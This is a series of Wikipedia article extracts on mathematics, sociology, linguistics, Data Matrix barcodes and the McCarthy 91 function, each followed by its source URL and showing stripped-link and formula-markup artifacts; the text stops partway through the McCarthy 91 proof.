IfNis a compact orientablen-dimensional manifold, thenNembeds inR2n−1{\displaystyle \mathbb {R} ^{2n-1}}(fornnot a power of 2 the orientability condition is superfluous). Forna power of 2 this is a result ofAndré HaefligerandMorris Hirsch(forn> 4), and Fuquan Fang (forn= 4); these authors used important preliminary results proved by Jacques Boéchat and Haefliger,Simon Donaldson, Hirsch andWilliam S. Massey.[4]Haefliger proved that ifNis a compactn-dimensionalk-connectedmanifold, thenNembeds inR2n−k{\displaystyle \mathbb {R} ^{2n-k}}provided2k+ 3 ≤n.[4]
A relatively 'easy' result is to prove that any two embeddings of a 1-manifold into R4{\displaystyle \mathbb {R} ^{4}} are isotopic (see Knot theory#Higher dimensions). This is proved using general position, which also allows one to show that any two embeddings of an n-manifold into R2n+2{\displaystyle \mathbb {R} ^{2n+2}} are isotopic. This result is an isotopy version of the weak Whitney embedding theorem.
Wu proved that forn≥ 2, any two embeddings of ann-manifold intoR2n+1{\displaystyle \mathbb {R} ^{2n+1}}are isotopic. This result is an isotopy version of the strong Whitney embedding theorem.
As an isotopy version of his embedding result,Haefligerproved that ifNis a compactn-dimensionalk-connected manifold, then any two embeddings ofNintoR2n−k+1{\displaystyle \mathbb {R} ^{2n-k+1}}are isotopic provided2k+ 2 ≤n. The dimension restriction2k+ 2 ≤nis sharp: Haefliger went on to give examples of non-trivially embedded 3-spheres inR6{\displaystyle \mathbb {R} ^{6}}(and, more generally,(2d− 1)-spheres inR3d{\displaystyle \mathbb {R} ^{3d}}). Seefurther generalizations.
|
https://en.wikipedia.org/wiki/Whitney_embedding_theorem
|
In geometry, a Moufang plane, named for Ruth Moufang, is a type of projective plane, more specifically a special type of translation plane. A translation plane is a projective plane that has a translation line, that is, a line with the property that the group of automorphisms that fixes every point of the line acts transitively on the points of the plane not on the line.[1] A translation plane is Moufang if every line of the plane is a translation line.[2]
A Moufang plane can also be described as a projective plane in which thelittle Desargues theoremholds.[3]This theorem states that a restricted form ofDesargues' theoremholds for every line in the plane.[4]For example, everyDesarguesian planeis a Moufang plane.[5]
In algebraic terms, a projective plane over anyalternative division ringis a Moufang plane,[6]and this gives a 1:1 correspondence between isomorphism classes of alternative division rings and of Moufang planes.
As a consequence of the algebraicArtin–Zorn theorem, that every finite alternative division ring is a field, every finite Moufang plane is Desarguesian, but some infinite Moufang planes arenon-Desarguesian planes. In particular, theCayley plane, an infinite Moufang projective plane over theoctonions, is one of these because the octonions do not form a division ring.[7]
The following conditions on a projective planePare equivalent:[8]
Also, in a Moufang plane:
|
https://en.wikipedia.org/wiki/Moufang_plane
|
In the mathematical area of game theory and of convex optimization, a minimax theorem is a theorem asserting that
under certain conditions on the setsX{\displaystyle X}andY{\displaystyle Y}and on the functionf{\displaystyle f}.[1]It is always true that the left-hand side is at most the right-hand side (max–min inequality) but equality only holds under certain conditions identified by minimax theorems. The first theorem in this sense isvon Neumann's minimax theorem about two-playerzero-sum gamespublished in 1928,[2]which is considered the starting point ofgame theory. Von Neumann is quoted as saying "As far as I can see, there could be no theory of games ... without that theorem ... I thought there was nothing worth publishing until the Minimax Theorem was proved".[3]Since then, several generalizations and alternative versions of von Neumann's original theorem have appeared in the literature.[4][5]
Von Neumann's original theorem[2]was motivated by game theory and applies to the case where
Under these assumptions, von Neumann proved that
In the context of two-playerzero-sum games, the setsX{\displaystyle X}andY{\displaystyle Y}correspond to the strategy sets of the first and second player, respectively, which consist of lotteries over their actions (so-calledmixed strategies), and their payoffs are defined by thepayoff matrixA{\displaystyle A}. The functionf(x,y){\displaystyle f(x,y)}encodes theexpected valueof the payoff to the first player when the first player plays the strategyx{\displaystyle x}and the second player plays the strategyy{\displaystyle y}.
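As a small numeric illustration (matching pennies, a standard 2×2 example not taken from this article), a crude grid search over mixed strategies shows the max–min and min–max values coinciding at the game value 0, attained by uniform play:

```python
# Matching pennies: zero-sum, payoff to the row player is A[i][j].
A = [[1, -1], [-1, 1]]

def f(p, q):
    # expected payoff when the row player mixes (p, 1-p)
    # and the column player mixes (q, 1-q)
    return sum(A[i][j] * [p, 1 - p][i] * [q, 1 - q][j]
               for i in range(2) for j in range(2))

grid = [k / 100 for k in range(101)]
maxmin = max(min(f(p, q) for q in grid) for p in grid)
minmax = min(max(f(p, q) for p in grid) for q in grid)
# both are numerically 0, the value of the game, with p = q = 1/2 optimal
```

Grid search only illustrates the equality; computing the value of a matrix game exactly is a linear programming problem.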
Von Neumann's minimax theorem can be generalized to domains that are compact and convex, and to functions that are concave in their first argument and convex in their second argument (known as concave-convex functions). Formally, letX⊆Rn{\displaystyle X\subseteq \mathbb {R} ^{n}}andY⊆Rm{\displaystyle Y\subseteq \mathbb {R} ^{m}}becompactconvexsets. Iff:X×Y→R{\displaystyle f:X\times Y\rightarrow \mathbb {R} }is a continuous function that is concave-convex, i.e.
Then we have that
Sion's minimax theorem is a generalization of von Neumann's minimax theorem due toMaurice Sion,[6]relaxing the requirement that X and Y be standard simplexes and that f be bilinear. It states:[6][7]
LetX{\displaystyle X}be aconvexsubset of alinear topological spaceand letY{\displaystyle Y}be acompactconvexsubset of alinear topological space. Iff{\displaystyle f}is a real-valuedfunctiononX×Y{\displaystyle X\times Y}with
Then we have that
|
https://en.wikipedia.org/wiki/Sion%27s_minimax_theorem
|
Thisbibliography of sociologyis a list of works, organized by subdiscipline, on the subject ofsociology. Some of the works are selected from general anthologies of sociology,[1][2][3][4][5]while other works are selected because they are notable enough to be mentioned in a general history of sociology or one of its subdisciplines.[i]
Sociology studiessocietyusing various methods of empirical investigation to understand humansocial activity, from themicrolevel of individualagencyand interaction to themacrolevel of systems andsocial structure.[6][7][8]
Economic sociology attempts to explaineconomicphenomena. While overlapping with the general study ofeconomicsat times, economic sociology chiefly concentrates on the roles of social relations and institutions.[25]
Industrial sociologyis the sociology oftechnologicalchange,globalization, labor markets, work organization,managerialpractices andemployment relations.[35][36]
Environmental sociologystudies the relationship between society and environment, particularly the social factors that cause environmental problems, the societal impacts of those problems, and efforts to solve the problems.
Demographyis thestatistical studyofhumanpopulation. It encompasses the study of the size, structure and distribution of these populations, and spatial and/or temporal changes in them in response tobirth,migration,aginganddeath.
Urban sociology refers to the study of social life and human interaction in metropolitan areas.
Sociology of knowledge refers to the study of the relationship between human thought and the social context within which it arises, as well as of the effects prevailing ideas have on societies.
Traditionally, political sociology has been concerned with the ways in which social trends, dynamics, and structures of domination affect formal political processes, as well as exploring how various social forces work together to change political policies.[67]Now, it is also concerned with the formation of identity through social interaction, the politics of knowledge, and other aspects of social relations.
The sociology of race and ethnic relations refers to the study ofsocial,political, andeconomicrelations betweenracesandethnicitiesat all levels of society, encompassing subjects such asracismandresidential segregation.
The sociology of religion concerns the role ofreligioninsociety, including practices, historical backgrounds, developments, and universal themes.[75]There is particular emphasis on the recurring role of religion in all societies and throughout recorded history.
Sociological theories are complextheoreticalandmethodologicalframeworks used to analyze and explain objects of social study, which ultimately facilitate the organization of sociological knowledge.[78]
Conflict theories, originally influenced byMarxist thought, are perspectives that see societies as defined through conflicts that are produced by inequality.[79]: 34–6Conflict theory emphasizessocial conflict, as well aseconomic inequality,social inequality,oppression, andcrime.
Rational choice theorymodels social behavior as the interaction of utility-maximizing individuals.
Social exchange theory models social interaction as a series of exchanges between actors who give one another rewards and penalties, which impacts and guides future behavior. George Homans' version of exchange theory specifically argues that behaviorist stimulus-response principles can explain the emergence of complex social structures.
Making use of network theory, social network analysis is a structural approach to sociology that views norms and behaviors as embedded in chains of social relations.
Sociocyberneticsis the application ofsystems theoryandcyberneticsto sociology.
Structural functionalismis a broad perspective that interprets society as astructurewith interrelated parts.
Symbolic interactionismargues that human behavior is guided by the meanings people construct together in social interaction.
|
https://en.wikipedia.org/wiki/Bibliography_of_sociology
|
-logyis asuffixin the English language, used with words originally adapted fromAncient Greekending in-λογία(-logía).[1]The earliest English examples were anglicizations of the French-logie, which was in turn inherited from theLatin-logia.[2]The suffix became productive in English from the 18th century, allowing the formation of new terms with no Latin or Greek precedent.
The English suffix has two separate main senses, reflecting two sources of the-λογίαsuffix in Greek:[3]
Philologyis an exception: while its meaning is closer to the first sense, the etymology of the word is similar to the second sense.[8]
In English names for fields of study, the suffix-logyis most frequently found preceded by the euphonic connective voweloso that the word ends in-ology.[9]In these Greek words, therootis always a noun and-o-is thecombining vowelfor all declensions of Greek nouns. However, when new names for fields of study are coined in modern English, the formations ending in-logyalmost always add an-o-, except when the root word ends in an "l" or a vowel, as in these exceptions:[10]analogy,dekalogy,disanalogy,genealogy,genethlialogy,hexalogy;herbalogy(a variant ofherbology),mammalogy,mineralogy,paralogy,petralogy(a variant ofpetrology);elogy;heptalogy;antilogy,festilogy;trilogy,tetralogy,pentalogy;palillogy,pyroballogy;dyslogy;eulogy; andbrachylogy.[7]Linguists sometimes jokingly refer tohaplologyashaplogy(subjecting the wordhaplologyto the process of haplology itself).
Per metonymy, words ending in -logy are sometimes used to describe a subject rather than the study of it (e.g., technology). This usage is particularly widespread in medicine; for example, pathology is often used simply to refer to "the disease" itself (e.g., "We haven't found the pathology yet") rather than "the study of a disease".
Books, journals, and treatises about a subject also often bear the name of this subject (e.g., the scientific journalEcology).
When appended to other English words, the suffix can also be used humorously to createnonce words(e.g.,beerologyas "the study of beer"). As with otherclassical compounds, adding the suffix to an initial word-stem derived from Greek orLatinmay be used to lend grandeur or the impression of scientific rigor to humble pursuits, as incosmetology("the study of beauty treatment") orcynology("the study of dog training").
The -logy or -ology suffix is commonly used to indicate a finite series of artworks such as books or films. For paintings, the suffix "-tych" is more common (e.g., diptych, triptych). Examples include:
Further terms like duology (two, mostly in genre fiction), quadrilogy (four), and octalogy (eight) have been coined but are rarely used; for a series of ten, "decalog" is sometimes used (e.g., in the Virgin Decalog) instead of "decalogy".
|
https://en.wikipedia.org/wiki/-logy
|
Inmathematics, ifA{\displaystyle A}is asubsetofB,{\displaystyle B,}then theinclusion mapis thefunctionι{\displaystyle \iota }that sends each elementx{\displaystyle x}ofA{\displaystyle A}tox,{\displaystyle x,}treated as an element ofB:{\displaystyle B:}ι:A→B,ι(x)=x.{\displaystyle \iota :A\rightarrow B,\qquad \iota (x)=x.}
An inclusion map may also be referred to as aninclusion function, aninsertion,[1]or acanonical injection.
A "hooked arrow" (U+21AA↪RIGHTWARDS ARROW WITH HOOK)[2]is sometimes used in place of the function arrow above to denote an inclusion map; thus:ι:A↪B.{\displaystyle \iota :A\hookrightarrow B.}
(However, some authors use this hooked arrow for anyembedding.)
This and other analogousinjectivefunctions[3]fromsubstructuresare sometimes callednatural injections.
Given anymorphismf{\displaystyle f}betweenobjectsX{\displaystyle X}andY{\displaystyle Y}, if there is an inclusion mapι:A→X{\displaystyle \iota :A\to X}into thedomainX{\displaystyle X}, then one can form therestrictionf∘ι{\displaystyle f\circ \iota }off.{\displaystyle f.}In many instances, one can also construct a canonical inclusion into thecodomainR→Y{\displaystyle R\to Y}known as therangeoff.{\displaystyle f.}
Inclusion maps tend to behomomorphismsofalgebraic structures; thus, such inclusion maps areembeddings. More precisely, given a substructure closed under some operations, the inclusion map will be an embedding for tautological reasons. For example, for some binary operation⋆,{\displaystyle \star ,}to require thatι(x⋆y)=ι(x)⋆ι(y){\displaystyle \iota (x\star y)=\iota (x)\star \iota (y)}is simply to say that⋆{\displaystyle \star }is consistently computed in the sub-structure and the large structure. The case of aunary operationis similar; but one should also look atnullaryoperations, which pick out aconstantelement. Here the point is thatclosuremeans such constants must already be given in the substructure.
Inclusion maps are seen inalgebraic topologywhere ifA{\displaystyle A}is astrong deformation retractofX,{\displaystyle X,}the inclusion map yields anisomorphismbetween allhomotopy groups(that is, it is ahomotopy equivalence).
Inclusion maps ingeometrycome in different kinds: for exampleembeddingsofsubmanifolds.Contravariantobjects (which is to say, objects that havepullbacks; these are calledcovariantin an older and unrelated terminology) such asdifferential formsrestrictto submanifolds, giving a mapping in theother direction. Another example, more sophisticated, is that ofaffine schemes, for which the inclusionsSpec(R/I)→Spec(R){\displaystyle \operatorname {Spec} \left(R/I\right)\to \operatorname {Spec} (R)}andSpec(R/I2)→Spec(R){\displaystyle \operatorname {Spec} \left(R/I^{2}\right)\to \operatorname {Spec} (R)}may be differentmorphisms, whereR{\displaystyle R}is acommutative ringandI{\displaystyle I}is anidealofR.{\displaystyle R.}
|
https://en.wikipedia.org/wiki/Inclusion_map
|
A Data Matrix is a two-dimensional code consisting of black and white "cells" or dots arranged in either a square or rectangular pattern, also known as a matrix. The information to be encoded can be text or numeric data. The usual data size is from a few bytes up to 1,556 bytes. The length of the encoded data depends on the number of cells in the matrix. Error correction codes are often used to increase reliability: even if one or more cells are damaged and unreadable, the message can still be read. A Data Matrix symbol can store up to 2,335 alphanumeric characters.
Data Matrix symbols are rectangular, usually square in shape and composed of square "cells" which representbits. Depending on the coding used, a "light" cell represents a 0 and a "dark" cell is a 1, or vice versa. Every Data Matrix is composed of two solid adjacent borders in an "L" shape (called the "finder pattern") and two other borders consisting of alternating dark and light "cells" or modules (called the "timing pattern"). Within these borders are rows and columns of cells encoding information. The finder pattern is used to locate and orient the symbol while the timing pattern provides a count of the number of rows and columns in the symbol. As more data is encoded in the symbol, the number of cells (rows and columns) increases. Each code is unique. Symbol sizes vary from 10×10 to 144×144 in the new version ECC 200, and from 9×9 to 49×49 in the old version ECC 000 – 140.
The most popular application for Data Matrix is marking small items, due to the code's ability to encode fifty characters in a symbol that is readable at 2 or 3 mm2 (0.003 or 0.005 sq in) and the fact that the code can be read with only a 20% contrast ratio.[1] A Data Matrix is scalable; commercial applications exist with images as small as 300 micrometres (0.012 in) (laser etched on a 600-micrometre (0.024 in) silicon device) and as large as a 1 metre (3 ft) square (painted on the roof of a boxcar). The fidelity of the marking and reading systems is the only limitation.
The USElectronic Industries Alliance(EIA) recommends using Data Matrix for labeling small electronic components.[2]
Data Matrix codes are becoming common on printed media such as labels and letters. The code can be read quickly by abarcode readerwhich allows the media to be tracked, for example when a parcel has been dispatched to the recipient.
For industrial engineering purposes, Data Matrix codes can be marked directly onto components, ensuring that only the intended component is identified with the data-matrix-encoded data. The codes can be marked onto components with various methods, but within the aerospace industry these are commonly industrial ink-jet, dot-peen marking, laser marking, and electrolytic chemical etching (ECE). These methods give a permanent mark which can last up to the lifetime of the component.
Data Matrix codes are usually verified using specialist camera equipment and software.[further explanation needed] This verification ensures the code conforms to the relevant standards, and ensures readability for the lifetime of the component. After a component enters service, the Data Matrix code can be read by a reader camera, which decodes the Data Matrix data; the data can then be used for a number of purposes, such as movement tracking or inventory stock checks.
Data Matrix codes, along with other open-source codes such as 1D barcodes can also be read with mobile phones by downloading code specific mobile applications. Although many mobile devices are able to read 2D codes including Data Matrix Code,[3]few extend the decoding to enable mobile access and interaction, whereupon the codes can be used securely and across media; for example, in track and trace, anti-counterfeit, e.govt, and banking solutions.
Data Matrix codes are used in thefood industryinautocodingsystems to prevent food products being packaged and dated incorrectly. Codes are maintained internally on a food manufacturers database and associated with each unique product, e.g. ingredient variations. For each product run the unique code is supplied to the printer. Label artwork is required to allow the 2D Data Matrix to be positioned for optimal scanning. For black on white codes testing isn't required unless print quality is an issue, but all color variations need to be tested before production to ensure they are readable.[citation needed]
In May 2006 a German computer programmer, Bernd Hopfengärtner, created a large Data Matrix in a wheat field (in a fashion similar tocrop circles). The message read "Hello, World!".[4]
Data Matrix symbols are made up of modules arranged within a perimeter finder and timing pattern. It can encode up to 3,116 characters from the entire ASCII character set (with extensions). The symbol consists of data regions which contain modules set out in a regular array. Large symbols contain several regions. Each data region is delimited by a finder pattern, and this is surrounded on all four sides by a quiet zone border (margin). (Note: the modules may be round or square; no specific shape is defined in the standard. For example, dot-peened cells are generally round.)
ECC 200, the newer version of Data Matrix, usesReed–Solomoncodes for error and erasure recovery. ECC 200 allows the routine reconstruction of the entire encoded data string when the symbol has sustained 30% damage, assuming the matrix can still be accurately located. Data Matrix has an error rate of less than 1 in 10 million characters scanned.[5]
Symbols have an even number of rows and an even number of columns. Most of the symbols are square, with sizes from 10 × 10 to 144 × 144. Some symbols, however, are rectangular, with sizes from 8 × 18 to 16 × 48 (even values only). All symbols using the ECC 200 error correction can be recognized by the upper-right corner module being the same as the background color (binary 0).
Additional capabilities that differentiate ECC 200 symbols from the earlier standards include:[6]
Older versions of Data Matrix include ECC 000, ECC 050, ECC 080, ECC 100 and ECC 140. Instead of using Reed–Solomon codes like ECC 200, ECC 000–140 use convolution-based error correction. Each varies in the amount of error correction it offers, with ECC 000 offering none and ECC 140 offering the greatest. For error detection at decode time, even in the case of ECC 000, each of these versions also encodes a cyclic redundancy check (CRC) on the bit pattern. As an added measure, the placement of each bit in the code is determined by bit-placement tables included in the specification. These older versions always have an odd number of modules, and can be made in sizes ranging from 9 × 9 to 49 × 49. All symbols using the ECC 000 through 140 error correction can be recognized by the upper-right corner module being the inverse of the background color (binary 1).
According to ISO/IEC 16022, "ECC 000–140 should only be used in closed applications where a single party controls both the production and reading of the symbols and is responsible for overall system performance."
Data Matrix was invented byInternational Data Matrix, Inc.(ID Matrix) which was merged into RVSI/Acuity CiMatrix, who were acquired bySiemensAG in October 2005 and Microscan Systems in September 2008. Data Matrix is covered today by severalISO/IECstandards and is in the public domain for many applications, which means it can be used free of any licensing or royalties.
Data Matrix codes useReed–Solomon error correctionover thefinite fieldF256{\displaystyle \mathbb {F} _{256}}(orGF(28)), the elements of which are encoded asbytes of 8 bits; the byteb7b6b5b4b3b2b1b0{\displaystyle b_{7}b_{6}b_{5}b_{4}b_{3}b_{2}b_{1}b_{0}}with a standard numerical value∑i=07bi2i{\displaystyle \textstyle \sum _{i=0}^{7}b_{i}2^{i}}encodes the field element∑i=07biαi{\displaystyle \textstyle \sum _{i=0}^{7}b_{i}\alpha ^{i}}whereα∈F256{\displaystyle \alpha \in \mathbb {F} _{256}}is taken to be a primitive element satisfyingα8+α5+α3+α2+1=0{\displaystyle \alpha ^{8}+\alpha ^{5}+\alpha ^{3}+\alpha ^{2}+1=0}. The primitive polynomial isx8+x5+x3+x2+1{\displaystyle x^{8}+x^{5}+x^{3}+x^{2}+1}, corresponding to the polynomial number 301, with initial root = 1 to obtain generator polynomials. The Reed–Solomon code uses different generator polynomials overF256{\displaystyle \mathbb {F} _{256}}, depending on how many error correction bytes the code adds. The number of bytes added is equal to the degree of the generator polynomial.
For example, in the 10 × 10 symbol, there are 3 data bytes and 5 error correction bytes. The generator polynomial is obtained as:g(x)=(x+α)(x+α2)(x+α3)(x+α4)(x+α5){\displaystyle g(x)=(x+\alpha )(x+\alpha ^{2})(x+\alpha ^{3})(x+\alpha ^{4})(x+\alpha ^{5})},
which gives:g(x)=x5+α235x4+α207x3+α210x2+α244x+α15{\displaystyle g(x)=x^{5}+\alpha ^{235}x^{4}+\alpha ^{207}x^{3}+\alpha ^{210}x^{2}+\alpha ^{244}x+\alpha ^{15}},
or with decimal coefficients:g(x)=x5+62x4+111x3+15x2+48x+228{\displaystyle g(x)=x^{5}+62x^{4}+111x^{3}+15x^{2}+48x+228}.
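This computation can be sketched in code. The following builds GF(256) log/antilog tables for the primitive polynomial 301 (a standard table construction, not code from the standard itself) and multiplies out the factors (x + αi); it reproduces the decimal coefficients just stated:

```python
# GF(256) arithmetic for Data Matrix: primitive polynomial
# x^8 + x^5 + x^3 + x^2 + 1, i.e. the number 0x12D = 301.
EXP = [0] * 510
LOG = [0] * 256
v = 1
for i in range(255):
    EXP[i] = v
    LOG[v] = i
    v <<= 1
    if v & 0x100:
        v ^= 0x12D
for i in range(255, 510):      # doubled table avoids a "mod 255" on lookup
    EXP[i] = EXP[i - 255]

def gf_mul(a, b):
    if a == 0 or b == 0:
        return 0
    return EXP[LOG[a] + LOG[b]]

def generator_poly(nsym):
    """(x + a)(x + a^2)...(x + a^nsym); coefficients, highest degree first."""
    g = [1]
    for i in range(1, nsym + 1):
        root = EXP[i]
        nxt = g + [0]                      # x * g(x)
        for j, c in enumerate(g):
            nxt[j + 1] ^= gf_mul(root, c)  # + root * g(x)
        g = nxt
    return g

print(generator_poly(5))  # [1, 62, 111, 15, 48, 228], matching g(x) above
```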
The encoding process is described in theISO/IECstandard 16022:2006.[7]Open-source software for encoding and decoding the ECC-200 variant of Data Matrix has been published.[8][9]
The diagrams below illustrate the placement of the message data within a Data Matrix symbol. The message is "Wikipedia", and it is arranged in a somewhat complicated diagonal pattern starting near the upper-left corner. Some characters are split in two pieces, such as the initial W, and the third 'i' is in "corner pattern 2" rather than the usual L-shaped arrangement. Also shown are the end-of-message code (marked End), the padding (P) and error correction (E) bytes, and four modules of unused space (X).
The symbol is of size 16×16 (14×14 data area), with 12 data bytes (including 'End' and padding) and 12 error correction bytes. A (255,243,6) Reed–Solomon code shortened to (24,12,6) is used. It can correct up to 6 byte errors or erasures.
To obtain the error correction bytes, the following procedure may be carried out:
The generator polynomial specified for the (24,12,6) code, is:g(x)=x12+242x11+100x10+178x9+97x8+213x7+142x6+42x5+61x4+91x3+158x2+153x+41{\displaystyle g(x)=x^{12}+242x^{11}+100x^{10}+178x^{9}+97x^{8}+213x^{7}+142x^{6}+42x^{5}+61x^{4}+91x^{3}+158x^{2}+153x+41},
which may also be written in the form of a matrix of decimal coefficients:
The 12-byte long message "Wikipedia" including 'End', P1 and P2, in decimal coefficients (see the diagrams below for the computation method using ASCII values), is:
Using the procedure forReed-Solomon systematic encoding, the 12 error correction bytes obtained (E1 through E12 in decimal) in the form of the remainder after polynomial division are:
These error correction bytes are then appended to the original message. The resulting coded message has 24 bytes, and is in the form:
or in decimal coefficients:
and in hexadecimal coefficients:
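The remainder computation itself can be sketched as follows (self-contained; the GF(256) tables are rebuilt, and the twelve-symbol generator coefficients are those of g(x) above). As a hypothetical message it uses the nine ASCII-mode codewords for "Wikipedia" (ASCII value + 1), without the End and padding bytes of the full example, so the check bytes here are not the E1 through E12 of the diagrams:

```python
# Reed-Solomon systematic encoding sketch: remainder of msg(x) * x^nsym
# divided by the generator polynomial over GF(256) with polynomial 0x12D.
EXP, LOG = [0] * 510, [0] * 256
v = 1
for i in range(255):
    EXP[i], LOG[v] = v, i
    v <<= 1
    if v & 0x100:
        v ^= 0x12D
for i in range(255, 510):
    EXP[i] = EXP[i - 255]

def gf_mul(a, b):
    return 0 if a == 0 or b == 0 else EXP[LOG[a] + LOG[b]]

def rs_check_bytes(msg, gen):
    """Remainder of msg(x)*x^(len(gen)-1) mod gen(x); gen monic, highest first."""
    buf = list(msg) + [0] * (len(gen) - 1)
    for i in range(len(msg)):
        factor = buf[i]
        if factor:
            for j in range(len(gen)):
                buf[i + j] ^= gf_mul(gen[j], factor)
    return buf[len(msg):]

# twelve-symbol generator, decimal coefficients of g(x) above
GEN = [1, 242, 100, 178, 97, 213, 142, 42, 61, 91, 158, 153, 41]

msg = [88, 106, 108, 106, 113, 102, 101, 106, 98]  # "Wikipedia", ASCII + 1
ecc = rs_check_bytes(msg, GEN)
# defining property of systematic encoding: appending the remainder
# makes the full codeword divisible by g(x)
assert rs_check_bytes(msg + ecc, GEN) == [0] * 12
```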
Multiple encoding modes are used to store different kinds of messages. The default mode stores oneASCIIcharacter per 8-bit codeword. Control codes are provided to switch between modes, as shown below.
The C40, Text and X12 modes are potentially more compact for storing text messages. They are similar to DEC Radix-50, using character codes in the range 0–39; three of these codes are combined to make a number up to 40³ = 64,000, which is packed into two bytes (which can hold values up to 65,535) as follows:
The resulting value of B1 is in the range 0–250. The special value 254 is used to return to ASCII encoding mode.
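The packing can be sketched as follows. The weights 1600 and 40 and the +1 offset follow the usual description of the C40 scheme; the helper names are illustrative. The largest triple (39, 39, 39) maps to B1 = 250, matching the stated range:

```python
def pack_c40(c1, c2, c3):
    # combine three C40 codes (each 0-39) into one value, then split in two bytes
    v = c1 * 1600 + c2 * 40 + c3 + 1       # 1600 = 40 * 40
    return v // 256, v % 256               # (B1, B2)

def unpack_c40(b1, b2):
    v = b1 * 256 + b2 - 1
    return v // 1600, (v // 40) % 40, v % 40

print(pack_c40(39, 39, 39))  # (250, 0)
assert unpack_c40(*pack_c40(5, 17, 29)) == (5, 17, 29)
```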
Character code interpretations are shown in the table below. The C40 and Text modes have four separate sets. Set 0 is the default, and contains codes that temporarily select a different set for the next character. The only difference between C40 and Text is that they reverse upper- and lower-case letters: C40 is primarily upper-case, with lower-case letters in set 3; Text is the other way around. Set 1, containing ASCII control codes, and set 2, containing punctuation symbols, are identical in C40 and Text modes.
EDIFACTmode uses six bits per character, with four characters packed into three bytes. It can store digits, upper-case letters, and many punctuation marks, but has no support for lower-case letters.
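Packing four 6-bit values into three bytes is plain bit manipulation; a minimal sketch:

```python
def pack_edifact(c):
    # four 6-bit EDIFACT codes -> 24 bits -> three bytes
    v = (c[0] << 18) | (c[1] << 12) | (c[2] << 6) | c[3]
    return [(v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF]

def unpack_edifact(b):
    v = (b[0] << 16) | (b[1] << 8) | b[2]
    return [(v >> 18) & 0x3F, (v >> 12) & 0x3F, (v >> 6) & 0x3F, v & 0x3F]

assert unpack_edifact(pack_edifact([10, 20, 30, 40])) == [10, 20, 30, 40]
```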
Base 256 mode data starts with a length indicator, followed by a number of data bytes. A length of 1 to 249 is encoded as a single byte, and longer lengths are stored as two bytes.
It is desirable to avoid long strings of zeros in the coded message, because they become large blank areas in the Data Matrix symbol, which may cause a scanner to lose synchronization. (The default ASCII encoding does not use zero for this reason.) To make that less likely, the length and data bytes are obscured by adding a pseudorandom value R(n), where n is the position in the byte stream.
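The 255-state pseudorandom sequence is commonly given as R(n) = ((149 × n) mod 255) + 1, with n the 1-based codeword position; the text does not spell R out, so that formula is stated here as an assumption. A sketch of the obscuring step and its inverse:

```python
def r255(n):
    # assumed pseudorandom value for codeword position n (1-based)
    return ((149 * n) % 255) + 1

def obscure(data, first_pos):
    return [(b + r255(first_pos + i)) % 256 for i, b in enumerate(data)]

def unobscure(data, first_pos):
    return [(b - r255(first_pos + i)) % 256 for i, b in enumerate(data)]

payload = [0, 0, 0, 65, 66]        # leading zeros no longer stay zeros
masked = obscure(payload, 1)
assert all(b != 0 for b in masked[:3])
assert unobscure(masked, 1) == payload
```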
Prior to the expiration of US patent 5,612,524[10] in November 2007, the intellectual property company Acacia Technologies claimed that Data Matrix was partially covered by the patent. As the patent owner, Acacia allegedly contacted Data Matrix users demanding license fees related to the patent.
Cognex Corporation, a large manufacturer of 2D barcode devices, filed adeclaratory judgmentcomplaint on 13 March 2006 after receiving information that Acacia had contacted its customers demanding licensing fees. On 19 May 2008 Judge Joan N. Ericksen of the U.S. District Court in Minnesota ruled in favor of Cognex.[11]The ruling held that the '524 patent, which claimed to cover a system for capturing and reading 2D symbology codes, is both invalid and unenforceable due toinequitable conductby the defendants during the procurement of the patent.
While the ruling was delivered after the patent expired, it precluded claims for infringement based on use of Data Matrix prior to November 2007.
A German patent application DE 4107020 was filed in 1991, and published in 1992. This patent is not cited in the above US patent applications and might invalidate them.[citation needed]
|
https://en.wikipedia.org/wiki/Data_Matrix
|
TheMcCarthy 91 functionis arecursive function, defined by thecomputer scientistJohn McCarthyas a test case forformal verificationwithincomputer science.
The McCarthy 91 function is defined as
M(n)={n−10,if n>100M(M(n+11)),if n≤100{\displaystyle M(n)={\begin{cases}n-10,&{\text{if }}n>100\\M(M(n+11)),&{\text{if }}n\leq 100\end{cases}}}
The results of evaluating the function are given by M(n) = 91 for all integer arguments n ≤ 100, and M(n) = n − 10 for n > 100. Indeed, M(101) = 101 − 10 = 91 as well; for n > 101 the value increases by 1 with each increment of n, e.g. M(102) = 92 and M(103) = 93.
The 91 function was introduced in papers published byZohar Manna,Amir PnueliandJohn McCarthyin 1970. These papers represented early developments towards the application offormal methodstoprogram verification. The 91 function was chosen for being nested-recursive (contrasted withsingle recursion, such as definingf(n){\displaystyle f(n)}by means off(n−1){\displaystyle f(n-1)}). The example was popularized by Manna's book,Mathematical Theory of Computation(1974). As the field of Formal Methods advanced, this example appeared repeatedly in the research literature.
In particular, it is viewed as a "challenge problem" for automated program verification.
Because it is easier to reason about tail-recursive control flow, an equivalent (extensionally equal) tail-recursive definition is often used: M(n) = mc(n, 1), where mc(n, c) = n if c = 0, mc(n − 10, c − 1) if n > 100, and mc(n + 11, c + 1) otherwise.
As one of the examples used to demonstrate such reasoning, Manna's book includes a tail-recursive algorithm equivalent to the nested-recursive 91 function. Many of the papers that report an "automated verification" (ortermination proof) of the 91 function only handle the tail-recursive version.
This is an equivalentmutuallytail-recursive definition:
A formal derivation of the mutually tail-recursive version from the nested-recursive one was given in a 1980 article byMitchell Wand, based on the use ofcontinuations.
Implementations of the nested-recursive algorithm exist in many languages, including Lisp, Haskell, OCaml, Python, and C; the tail-recursive algorithm has corresponding implementations in OCaml and C.
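As a sketch, both algorithms can be written in Python (the function names are ours):

```python
def mccarthy91(n):
    """Nested-recursive definition:
    M(n) = n - 10 if n > 100, otherwise M(M(n + 11))."""
    if n > 100:
        return n - 10
    return mccarthy91(mccarthy91(n + 11))


def mccarthy91_tail(n):
    """Equivalent tail-recursive version, written iteratively:
    the counter c tracks the number of pending applications of M."""
    c = 1
    while c != 0:
        if n > 100:
            n, c = n - 10, c - 1
        else:
            n, c = n + 11, c + 1
    return n
```

Both return 91 for every argument n ≤ 100, and n − 10 otherwise; the iterative version avoids the nested recursion entirely.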
Here is a proof that the McCarthy 91 function M is equivalent to the non-recursive function M′ defined by M′(n) = 91 for n ≤ 100 and M′(n) = n − 10 for n > 100.
For n > 100, the definitions of M′ and M are the same. The equality therefore follows from the definition of M.
For n ≤ 100, a strong induction downward from 100 can be used:
For 90 ≤ n ≤ 100, M(n) = M(M(n + 11)) = M(n + 11 − 10) = M(n + 1), since n + 11 > 100.
